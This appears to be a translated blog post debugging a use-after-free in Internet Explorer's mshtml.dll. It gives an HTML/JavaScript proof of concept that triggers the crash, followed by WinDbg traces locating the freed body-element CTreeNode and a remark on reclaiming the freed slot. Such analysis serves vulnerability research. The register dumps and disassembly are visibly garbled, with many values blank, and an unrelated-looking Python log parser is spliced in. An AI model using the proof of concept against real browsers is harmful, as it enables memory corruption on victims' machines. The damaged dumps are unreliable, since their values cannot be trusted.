Heads up! This post is fairly long, because I recorded the complete debugging process; anyone interested can read through it. If you are short on patience, skip straight to the summary at the end :)

Microsoft Internet Explorer Remote Code Execution Vulnerability (CNNVD-201309-304)

Internet Explorer (IE) is a web browser developed by Microsoft and the default browser shipped with the Windows operating system.
A remote code execution vulnerability exists in the SetMouseCapture implementation in mshtml.dll in Microsoft IE versions 6 through 11. The vulnerability stems from the program accessing an object in memory that has been deleted or not properly allocated. An attacker could host a specially crafted website, entice a user to view it, and use the vulnerability to execute arbitrary code in IE in the context of the current user, causing memory corruption. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative rights, the attacker could take complete control of the affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights.

The PoC is as follows:

<html>
<script>
function trigger()
{
    var id_0 = document.createElement("sup");
    var id_1 = document.createElement("audio");
    document.body.appendChild(id_0);
    document.body.appendChild(id_1);
    // make id_1 the parent of id_0 in the tree
    id_1.applyElement(id_0);
    // the handler rewrites the document, which tears down the current markup
    // (see the CTreeNode::Release stack below)
    id_0.onlosecapture = function(e) { document.write(""); };
    id_0['outerText'] = "";
    // setCapture reaches CDoc::SetMouseCapture (see the crash backtrace)
    id_0.setCapture();
    id_1.setCapture();
}
window.onload = function() { trigger(); }
</script>
</html>

The program crashes as shown below; the value in edi triggers the exception. Analysis shows that edi is passed in from the calling function and points into a heap block that has already been freed. The debug log follows.

:> g
(ed4.bd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx=041ce6c8 ecx=05e00680 edx=041ce400 esi= edi=074a9fb0
eip=656c1f60 esp=041ce618 ebp=041ce620 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CDoc::HasContainerCapture+0x14:
656c1f60 8b0f mov ecx,dword ptr [edi] ds::074a9fb0=????????
:> !heap -p -a edi
address 074a9fb0 found in
_DPH_HEAP_ROOT @
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
: 74a9000
6b4890b2 verifier!AVrfDebugPageHeapFree+0x000000c2
771e5674 ntdll!RtlDebugFreeHeap+0x0000002f
771a7aca ntdll!RtlpFreeHeap+0x0000005d
77172d68 ntdll!RtlFreeHeap+0x00000142
75a5f1ac kernel32!HeapFree+0x00000014
656be590 mshtml!CTreeNode::Release+0x0000002d
656d15b1 mshtml!CMarkup::UnloadContents+0x00000380
656d2a8a mshtml!CMarkup::TearDownMarkupHelper+0x00000055
656d2a15 mshtml!CMarkup::TearDownMarkup+0x00000049
655b3b5e mshtml!COmWindowProxy::SwitchMarkup+0x000005a0
65502bb4 mshtml!CDocument::open+0x00000426
mshtml!CDocument::write+0x0000007c
655b3267 mshtml!Method_void_SAFEARRAYPVARIANTP+0x00000085
656e235c mshtml!CBase::ContextInvokeEx+0x000005dc
656e25d5 mshtml!CBase::InvokeEx+0x00000025
656edf9a mshtml!DispatchInvokeCollection+0x0000014c
656a4998 mshtml!CDocument::InvokeEx+0x000000f0
mshtml!CBase::VersionedInvokeEx+0x00000020
mshtml!PlainInvokeEx+0x000000eb
6b4ea22a jscript!IDispatchExInvokeEx2+0x00000104
6b4ea175 jscript!IDispatchExInvokeEx+0x0000006a
6b4ea3f6 jscript!InvokeDispatchEx+0x00000098
6b4ea4a0 jscript!VAR::InvokeByName+0x00000139
6b4fd8c8 jscript!VAR::InvokeDispName+0x0000007d
6b4fd96f jscript!VAR::InvokeByDispID+0x000000ce
6b4fe3e7 jscript!CScriptRuntime::Run+0x00002b80
6b4f5c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
6b4f5bfb jscript!ScrFncObj::Call+0x0000008d
6b4f5e11 jscript!CSession::Execute+0x0000015f
6b4ef3ee jscript!NameTbl::InvokeDef+0x000001b5
6b4eea2e jscript!NameTbl::InvokeEx+0x0000012c
65707af1 mshtml!CBase::InvokeDispatchWithThis+0x000001e1

This shows that edi is a pointer to a CTreeNode object that has already been freed. The stack backtrace is as follows:

:> KV
ChildEBP RetAddr Args to Child
0428e510 656c1a82 069f4ff0 mshtml!CDoc::HasContainerCapture+0x14
0428e594 6573163d 0428e5b8 mshtml!CDoc::PumpMessage+0x3e4
0428e650 657f580d 0614fff0 069f4ff0 mshtml!CDoc::SetMouseCapture+0xe7
0428e678 654da5d0 07689fc8 0000ffff 0495bfd0 mshtml!CElement::setCapture+0x51
0428e6a0 656e235c 07689fc8 0495bfd0 07665fd8 mshtml!Method_void_oDoVARIANTBOOL+0xc5
0428e714 656ec75a 07689fc8 mshtml!CBase::ContextInvokeEx+0x5dc
0428e764 656ec79a 07689fc8 mshtml!CElement::ContextInvokeEx+0x9d
0428e790 07689fc8 mshtml!CInput::VersionedInvokeEx+0x2d
0428e7e4 6a58a22a 076abfd8 mshtml!PlainInvokeEx+0xeb
0428e820 6a58a175 06eb0d10 jscript!IDispatchExInvokeEx2+0x104
0428e85c 6a58a3f6 06eb0d10 jscript!IDispatchExInvokeEx+0x6a
0428e91c 6a58a4a0 jscript!InvokeDispatchEx+0x98
0428e950 6a59d8c8 06eb0d10 0428e984 jscript!VAR::InvokeByName+0x139
0428e99c 6a59d96f 06eb0d10 jscript!VAR::InvokeDispName+0x7d
0428e9c8 6a59e3e7 06eb0d10 jscript!VAR::InvokeByDispID+0xce
0428eb64 6a595c9d 0428eb7c 0493ef88 jscript!CScriptRuntime::Run+0x2b80
0428ec4c 6a595bfb 0493cf70 jscript!ScrFncObj::CallWithFrameOnStack+0xce
0428ec94 6a5974ac 0493cf70 jscript!ScrFncObj::Call+0x8d
0428ed18 6a594ea4 06eb2fa0 06eb0d10 jscript!NameTbl::InvokeInternal+0x141
0428ed4c 6a59e3e7 06eb0d10 jscript!VAR::InvokeByDispID+0x17f

Look at the call site:

:> UB 656c1a82
mshtml!CDoc::PumpMessage+0x3c0:
656c1a5e 81a7580700007fffffff and dword ptr [edi+758h],0FFFFFF7Fh
656c1a68 push edi
656c1a69 e8eafdffff call mshtml!CDoc::ReleaseDetachedCaptures (656c1858)
656c1a6e 837c242c00 cmp dword ptr [esp+2Ch],
656c1a73 je mshtml!CDoc::PumpMessage+0x444 (656c1a8a)
656c1a75 8b7c2410 mov edi,dword ptr [esp+10h]
656c1a79 8b4c2414 mov ecx,dword ptr [esp+14h]
656c1a7d e8c6040000 call mshtml!CDoc::HasContainerCapture (656c1f48)

But this still does not explain how the freed object gets reused, and that is exactly what makes IE vulnerability analysis hard: you have to start from the execution flow to make sense of it.

We now have a hypothesis: the UAF object is the CTreeNode of some element, so we can try the generic CTreeNode breakpoints.

Break on creation: CTreeNode::CTreeNode; on release: CTreeNode::Release

bu mshtml!CTreeNode::Release "ln poi(poi(edx));.echo ==CTreeNode释放==;gc;"

Add a helper statement to the PoC to assist debugging:

Math.tan(1, 2); // the argument values are arbitrary (the original digits were lost); the call only serves as a breakpoint marker
bu jscript!tan

Break on tan first and only then set the logging breakpoints, so that elements not created by the PoC do not interfere:

:> g
(690d70e0) mshtml!CPhraseElement::`vftable' | (690d7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
(690d70e0) mshtml!CPhraseElement::`vftable' | (690d7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
(690fc2e8) mshtml!CGenericElement::`vftable' | (69234ce0) mshtml!CHeaderElement::`vftable'
Exact matches:
mshtml!CGenericElement::`vftable' = <no type information>
==CTreeNode释放==
(690d70e0) mshtml!CPhraseElement::`vftable' | (690d7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
(6921d3a8) mshtml!CHeadElement::`vftable' | (6921d0d8) mshtml!CHtmlElement::`vftable'
Exact matches:
mshtml!CHeadElement::`vftable' = <no type information>
==CTreeNode释放==
(6921d628) mshtml!CTitleElement::`vftable' | (690d5900) mshtml!CMetaElement::`vftable'
Exact matches:
mshtml!CTitleElement::`vftable' = <no type information>
==CTreeNode释放==
() mshtml!CScriptElement::`vftable' | (69245724) mshtml!CScriptElement::DownLoadScript
Exact matches:
mshtml!CScriptElement::`vftable' = <no type information>
==CTreeNode释放==
() mshtml!CBodyElement::`vftable' | (69289108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>
==CTreeNode释放==
(6921d0d8) mshtml!CHtmlElement::`vftable' | (6921d359) mshtml!CHeadElement::CreateElement
Exact matches:
mshtml!CHtmlElement::`vftable' = <no type information>
==CTreeNode释放==
(6921a9a8) mshtml!CRootElement::`vftable' | (69288ba0) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==
(6921a9a8) mshtml!CRootElement::`vftable' | (69288ba0) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==
(6921a9a8) mshtml!CRootElement::`vftable' | (69288ba0) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放== crashed....

This gives the complete CTreeNode release sequence. To match it against the crash, add an r edx to the logging breakpoint (edx holds the CTreeNode being released) and compare the logged addresses with edi at the crash.

bu mshtml!CTreeNode::Release ".echo ==CTreeNode释放==;r edx;ln poi(poi(edx));gc;"

This time the CTreeNode object addresses are visible; compare them with the object address at the crash:

:> g
==CTreeNode释放==
edx=10d34fb0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
edx=0a2a4fb0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
edx=132dafb0
(6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable'
Exact matches:
mshtml!CGenericElement::`vftable' = <no type information>
==CTreeNode释放==
edx=132dafb0
(6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable'
Exact matches:
mshtml!CGenericElement::`vftable' = <no type information>
==CTreeNode释放==
edx=0a2a4fb0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
edx=0d152fb0
(6a23d3a8) mshtml!CHeadElement::`vftable' | (6a23d0d8) mshtml!CHtmlElement::`vftable'
Exact matches:
mshtml!CHeadElement::`vftable' = <no type information>
==CTreeNode释放==
edx=13f3afb0
(6a23d628) mshtml!CTitleElement::`vftable' | (6a0f5900) mshtml!CMetaElement::`vftable'
Exact matches:
mshtml!CTitleElement::`vftable' = <no type information>
==CTreeNode释放==
edx=13f3afb0
(6a23d628) mshtml!CTitleElement::`vftable' | (6a0f5900) mshtml!CMetaElement::`vftable'
Exact matches:
mshtml!CTitleElement::`vftable' = <no type information>
==CTreeNode释放==
edx=13f3afb0
(6a23d628) mshtml!CTitleElement::`vftable' | (6a0f5900) mshtml!CMetaElement::`vftable'
Exact matches:
mshtml!CTitleElement::`vftable' = <no type information>
==CTreeNode释放==
edx=13358fb0
(6a265438) mshtml!CScriptElement::`vftable' | (6a265724) mshtml!CScriptElement::DownLoadScript
Exact matches:
mshtml!CScriptElement::`vftable' = <no type information>
==CTreeNode释放==
edx=07636fb0
(6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>
==CTreeNode释放==
edx=0e418fb0
(6a23d0d8) mshtml!CHtmlElement::`vftable' | (6a23d359) mshtml!CHeadElement::CreateElement
Exact matches:
mshtml!CHtmlElement::`vftable' = <no type information>
==CTreeNode释放==
edx=14ec8fb0
(6a23a9a8) mshtml!CRootElement::`vftable' | (6a2a8ba0) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==
edx=14ec8fb0
(6a23a9a8) mshtml!CRootElement::`vftable' | (6a2a8ba0) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==
edx=14ec8fb0
(6a23a9a8) mshtml!CRootElement::`vftable' | (6a2a8ba0) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>
(9bc.eb4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx=03eee688 ecx=062fa680 edx=03eee3c0 esi= edi=07636fb0
eip=6a301f60 esp=03eee5d8 ebp=03eee5e0 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CDoc::HasContainerCapture+0x14:
6a301f60 8b0f mov ecx,dword ptr [edi] ds::07636fb0=????????

The comparison shows that the UAF is caused by the CTreeNode belonging to the mshtml!CBodyElement object. For an exploit writer, the most important thing about a UAF is the exact moment at which the UAF object is freed; only once that is known can the freed slot be reclaimed.
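The address comparison just described can be automated. The following Python script is an added example, not code from the original post or from Microsoft: it parses the session log produced by the r edx / ln poi(poi(edx)) breakpoint together with the access-violation record and reports which element's CTreeNode the faulting edi points to. The embedded log is a constructed, abridged copy of the output above.

```python
"""Added example (not from the original post): automate the post's manual comparison
of the edx logged at each CTreeNode::Release with the edi faulting in
CDoc::HasContainerCapture. Input: the WinDbg session log written by the breakpoint
  bu mshtml!CTreeNode::Release ".echo ==CTreeNode释放==;r edx;ln poi(poi(edx));gc;"
Page heap makes addresses unique within one run only, so match inside one log."""
import re

MARKER = "==CTreeNode释放=="
EDX_RE = re.compile(r"^edx=([0-9a-f]{8})$")
CLASS_RE = re.compile(r"^(mshtml!\w+)::`vftable' = ")  # "Exact matches:" line of ln
REG_RE = re.compile(r"\b(e[a-d]x|e[sd]i|e[sb]p|eip)=([0-9a-f]{8})\b")
# Faulting instruction, e.g. "mov ecx,dword ptr [edi]  ds:0023:07636fb0=????????"
FAULT_RE = re.compile(r"ptr \[(e[a-d]x|e[sd]i|e[sb]p)\]\s+ds:[0-9a-f]*:?([0-9a-f]{8})=\?+")

def parse_releases(log):
    """List of (address, element_class) tuples, one per marker, in logged order.
    address is edx on entry to CTreeNode::Release, i.e. the CTreeNode pointer."""
    lines = [ln.strip() for ln in log.splitlines()]
    releases = []
    for i, line in enumerate(lines):
        if line != MARKER:
            continue
        addr = cls = None
        for follow in lines[i + 1:i + 6]:  # a record spans at most five lines
            if follow == MARKER:
                break
            m = EDX_RE.match(follow)
            if m:
                addr = int(m.group(1), 16)
            m = CLASS_RE.match(follow)
            if m:
                cls = m.group(1)
        releases.append((addr, cls))
    return releases

def parse_crash(log):
    """(faulting_register, faulting_address) from the access-violation record,
    or None when the log contains no fault."""
    regs = {}
    for line in log.splitlines():
        if "Access violation" in line:
            regs = {}  # the register dump that matters follows this line
        for reg, val in REG_RE.findall(line):
            regs[reg] = int(val, 16)
        m = FAULT_RE.search(line)
        if m:
            reg, addr = m.group(1), int(m.group(2), 16)
            if regs.get(reg, addr) != addr:
                raise ValueError("register dump and ds: annotation disagree")
            return reg, addr
    return None

def attribute_crash(log):
    """Which element's CTreeNode the dangling pointer belonged to, and how many
    other releases were logged between its free and the crash."""
    crash = parse_crash(log)
    if crash is None:
        return None
    reg, addr = crash
    releases = parse_releases(log)
    idx = [i for i, (a, _) in enumerate(releases) if a == addr]
    result = {"register": reg, "address": addr, "element": None,
              "release_indices": idx, "releases_before_crash": None}
    if idx:
        # Release is refcounted, so one node may be logged several times; the
        # last entry is the decrement that actually freed it (the post's
        # !heap -p -a stack shows HeapFree called from CTreeNode::Release).
        result["element"] = releases[idx[-1]][1]
        result["releases_before_crash"] = len(releases) - idx[-1] - 1
    return result

# Constructed, abridged copy of the session log in the post: three release
# records followed by the crash record.
SAMPLE_LOG = """\
==CTreeNode释放==
edx=10d34fb0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
edx=07636fb0
(6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>
==CTreeNode释放==
edx=14ec8fb0
(6a23a9a8) mshtml!CRootElement::`vftable' | (6a2a8ba0) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>
(9bc.eb4): Access violation - code c0000005 (first chance)
eax=00000000 ebx=03eee688 ecx=062fa680 edx=03eee3c0 esi=00000000 edi=07636fb0
6a301f60 8b0f            mov     ecx,dword ptr [edi]  ds:0023:07636fb0=????????
"""

if __name__ == "__main__":
    print(attribute_crash(SAMPLE_LOG))
```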

 bu mshtml!CTreeNode::Release ".echo ==CTreeNode释放==;r edx;ln poi(poi(edx));.if(edx==07636fb0){}.else{gc;}"

But this breakpoint never fires, because the heap addresses are different on every run.

So the only option is to drop the gc and step through manually until we reach:

==CTreeNode释放==
edx=07636fb0
(6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>

:> kv
ChildEBP RetAddr Args to Child
0437d520 6a310a05 0753ff64 0753ff30 0753ff30 mshtml!CTreeNode::Release (FPO: [,,])
0437d584 6a3115b1 0753ff30 mshtml!CMarkup::DestroySplayTree+0x285
0437d5f0 6a312a8a 0753ff30 mshtml!CMarkup::UnloadContents+0x380
0437d60c 6a312a15 0753ff30 mshtml!CMarkup::TearDownMarkupHelper+0x55
0437d638 6a1f3b5e 076c8f30 mshtml!CMarkup::TearDownMarkup+0x49
0437d6a0 6a142bb4 076c8f30 mshtml!COmWindowProxy::SwitchMarkup+0x5a0
0437d79c 6a140789 060e2fc8 mshtml!CDocument::open+0x426
0437d818 6a1f3267 060e2fc8 08df5fe8 08c0cfd0 mshtml!CDocument::write+0x7c
0437d838 6a32235c 060e2fc8 08c0cfd0 08df1fd8 mshtml!Method_void_SAFEARRAYPVARIANTP+0x85
0437d8ac 6a3225d5 060e2fc8 0000041e mshtml!CBase::ContextInvokeEx+0x5dc
0437d8d8 6a32df9a 060e2fc8 0000041e mshtml!CBase::InvokeEx+0x25
0437d928 6a2e4998 060e2fc8 0000000b 0000041e mshtml!DispatchInvokeCollection+0x14c
0437d970 6a2d3148 060e2fc8 0000041e mshtml!CDocument::InvokeEx+0xf0
0437d998 6a2d3104 060e2fc8 0000041e mshtml!CBase::VersionedInvokeEx+0x20
0437d9ec 6c75a22a 08dbafd8 0000041e mshtml!PlainInvokeEx+0xeb
0437da28 6c75a175 06ebad10 0000041e jscript!IDispatchExInvokeEx2+0x104
0437da64 6c75a3f6 06ebad10 jscript!IDispatchExInvokeEx+0x6a
0437db24 6c75a4a0 0000041e jscript!InvokeDispatchEx+0x98
0437db58 6c76d8c8 06ebad10 0437db8c jscript!VAR::InvokeByName+0x139
0437dba4 6c76d96f 06ebad10 jscript!VAR::InvokeDispName+0x7d

This backtrace does not actually reveal much on its own, but it is useful as a reference later. Now look back at the PoC: createElement can be monitored with a breakpoint on CElement::CElement, but appendChild is less familiar. What is certain is that this function is inherited from the CElement class:

; Attributes: bp-based frame

; public: long __stdcall CElement::appendChild(struct IHTMLDOMNode *, struct IHTMLDOMNode * *)
?appendChild@CElement@@QAGJPAUIHTMLDOMNode@@PAPAU2@@Z proc near
var_10= word ptr -10h
arg_0= dword ptr
arg_4= dword ptr 0Ch
arg_8= dword ptr 10h

mov edi, edi
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 10h
push esi
push edi ; pvarg
push [ebp+arg_8]
xor eax, eax
lea edi, [esp+1Ch+var_10]
stosd
stosd
stosd
stosd
sub esp, 10h
xor eax, eax
mov edi, esp
push [ebp+arg_4]
inc eax
push [ebp+arg_0]
mov [esp+34h+var_10], ax
lea esi, [esp+34h+var_10]
movsd
movsd
movsd
movsd
call ?insertBefore@CElement@@QAGJPAUIHTMLDOMNode@@UtagVARIANT@@PAPAU2@@Z ; CElement::insertBefore(IHTMLDOMNode *,tagVARIANT,IHTMLDOMNode * *)
lea esi, [esp+18h+var_10]
mov edi, eax
call _VariantClear@ ; VariantClear(x)
mov eax, edi
pop edi
pop esi
mov esp, ebp
pop ebp
retn 0Ch
?appendChild@CElement@@QAGJPAUIHTMLDOMNode@@PAPAU2@@Z endp ; sp-analysis failed

From JavaScript we know that appendChild adds a child node to an element.

Example:
var div = document.createElement("div"); // create a new div element node
document.body.appendChild(div); // append the div node to the body node as its child, after body's existing children

Eventually, after a series of calls, this function reaches CTreeNode::CTreeNode to initialize a CTreeNode object. Let's debug that process:

<html>
<script>
function trigger()
{
    Math.tan(1, 2); // debug marker: breakpoint on jscript!tan (argument values are arbitrary; the original digits were lost)
    var id_0 = document.createElement("sup");
    var id_1 = document.createElement("audio");
    Math.cos(1, 2); // debug marker: jscript!cos
    document.body.appendChild(id_0);
    Math.sin(1, 2); // debug marker: jscript!sin
    document.body.appendChild(id_1);
    Math.tan(1, 2); // debug marker: jscript!tan
    id_1.applyElement(id_0);
    id_0.onlosecapture = function(e) {
        document.write("");
    };
    id_0['outerText'] = "";
    id_0.setCapture();
    id_1.setCapture();
}
window.onload = function() {
    trigger();
}
</script>
</html>

The PoC above has the helper debugging statements added:

Breakpoint  hit
eax= ebx=0411e380 ecx= edx= esi=0411e370 edi=0411e370
eip=6c77d8c0 esp=0411e274 ebp=0411e2b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
jscript!tan:
6c77d8c0 ff258010756c jmp dword ptr [jscript!_imp__tan (6c751080)] ds::6c751080={msvcrt!tan (773dde34)}
:> bu mshtml!CreateElement
Matched: 6a23d88c mshtml!CreateElement = <no type information>
Matched: 6a234bb0 mshtml!CreateElement = <no type information>
Ambiguous symbol error at 'mshtml!CreateElement'
:> bu 6a23d88c
:> bu 6a234bb0
:> bu jscript!cos
:> g
Breakpoint hit
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement:
6a234bb0 8bff mov edi,edi

Let's trace into mshtml!CreateElement; I already described this function in my earlier IE debugging notes.

:> g
Breakpoint hit
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement:
6a234bb0 8bff mov edi,edi
:> p
Breakpoint hit
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement:
6a234bb0 8bff mov edi,edi
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb2 esp=0425e67c ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x2:
6a234bb2 push ebp
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb3 esp=0425e678 ebp=0425e718 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3:
6a234bb3 8bec mov ebp,esp
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb5 esp=0425e678 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x5:
6a234bb5 83ec10 sub esp,10h
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb8 esp=0425e668 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x8:
6a234bb8 push ebx
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb9 esp=0425e664 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x9:
6a234bb9 8b5d10 mov ebx,dword ptr [ebp+10h] ss::0425e688=
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bbc esp=0425e664 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0xc:
6a234bbc push esi
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bbd esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0xd:
6a234bbd c7451000000000 mov dword ptr [ebp+10h], ss::0425e688=
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bc4 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x14:
6a234bc4 85db test ebx,ebx
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bc6 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x16:
6a234bc6 0f84c67d0300 je mshtml!CreateElement+0x18 (6a26c992) [br=]
:>
eax=0425e750 ebx= ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a26c992 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x18:
6a26c992 bb08832a6a mov ebx,offset mshtml!g_Zero (6a2a8308)
:>
eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a26c997 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x1d:
6a26c997 e93082fcff jmp mshtml!CreateElement+0x1d (6a234bcc)
:>
eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bcc esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x1d:
6a234bcc 0fb64701 movzx eax,byte ptr [edi+] ds::0425e6a9=
:>
eax= ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bd0 esp=0425e660 ebp=0425e678 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x21:
6a234bd0 c1e004 shl eax,
:>
eax= ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bd3 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x24:
6a234bd3 05709a2c6a add eax,offset mshtml!g_atagdesc (6a2c9a70)
:>
eax=6a2ca070 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bd8 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x29:
6a234bd8 0f84b34e1500 je mshtml!CreateElement+0x2b (6a389a91) [br=]
:>
eax=6a2ca070 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bde esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x38:
6a234bde 8b4008 mov eax,dword ptr [eax+] ds::6a2ca078={mshtml!CPhraseElement::CreateElement (6a269f4b)}
:>
eax=6a269f4b ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be1 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3b:
6a234be1 8d4d10 lea ecx,[ebp+10h]
:>
eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be4 esp=0425e660 ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3e:
6a234be4 push ecx
:>
eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be5 esp=0425e65c ebp=0425e678 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CreateElement+0x3f:
6a234be5 push edx
:>
